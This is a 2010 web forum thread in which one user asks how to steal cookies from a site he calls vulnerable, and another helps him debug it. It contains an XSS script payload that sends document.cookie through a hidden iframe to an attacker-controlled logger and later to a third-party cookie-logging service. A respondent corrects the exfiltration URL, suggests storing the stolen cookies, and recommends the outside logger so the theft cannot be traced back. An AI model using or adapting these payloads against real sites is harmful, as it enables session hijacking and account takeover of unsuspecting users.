Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
How do I
Posted by: ExtraBB
Date: February 16, 2010 09:49AM

continue from this:
I found a vulnerable website.

on my domain I have this phpfile called cookie.php:

<?PHP
var_dump($_GET);
?>

At the vulnerable website I entered:
<script>
var theCookie = document.cookie;
document.write(‘<iframe width=\”1\” height=\”1\” style=\”visibiliy: hidden\” href=\”http://my.domain.com/cookie.php?theCookie=’ +theCookie+ ‘\” ></iframe>’);
</script>

But nothing happened.. What am I doing wrong?

Options: ReplyQuote
Re: How do I
Posted by: PaPPy
Date: February 16, 2010 09:57AM

when you try visiting your page
http://my.domain.com/cookie.php?theCookie=testing

does it print out the word testing?

if you include it thru the hidden iframe, obviously you wont see it

you may want to change your php script to save the cookies to a text file

on a side note, not sure if this still works
http://sla.ckers.org/forum/read.php?2,24566

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 02/16/2010 10:43AM by PaPPy.

Options: ReplyQuote
Re: How do I
Posted by: ExtraBB
Date: February 16, 2010 11:16AM

When I visit my page I get this message:
array(0) { }

there isn't any data in the array.

Also how do I have to adjust my code to let it work with wocares.com/il ?

Options: ReplyQuote
Re: How do I
Posted by: PaPPy
Date: February 16, 2010 11:50AM

Try echo $_GET['theCookie'];
instead of dump vara

or you could use the link I provided instead of your script. That way it doesn't like back to your webserver and you are sued. ;)

http://www.xssed.com/archive/author=PaPPy/



Edited 1 time(s). Last edit at 02/16/2010 01:56PM by PaPPy.

Options: ReplyQuote
Re: How do I
Posted by: ExtraBB
Date: February 16, 2010 04:02PM

Thanks dude.
I used that website and made a profile.
I put this in the vulnerable website:
<script>
var theCookie = document.cookie;
document.write(‘<iframe width=\”1\” height=\”1\” style=\”visibiliy: hidden\” href=\”http://wocares.com/il/i.php?p=35&i=info’ +theCookie+ ‘\” ></iframe>’);
</script>

is that correct?

Options: ReplyQuote
Re: How do I
Posted by: PaPPy
Date: February 16, 2010 05:28PM

your url should be
http://wocares.com/il/i.php?p=35&i=
so the cookie gets placed into the i= variable

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote
Re: How do I
Posted by: ExtraBB
Date: February 17, 2010 02:07AM

Thanks, but I still don't see any logs on wocares/il when I put that script in..
Is the site's security better than I thought? or am I still doing something wrong?

Options: ReplyQuote
Re: How do I
Posted by: PaPPy
Date: February 17, 2010 07:09AM

pm me a link of it to your page with the script on it

as i cant read minds, to figure out exactly what you did, i can take a look and let you know

http://www.xssed.com/archive/author=PaPPy/

Options: ReplyQuote


Sorry, only registered users may post in this forum.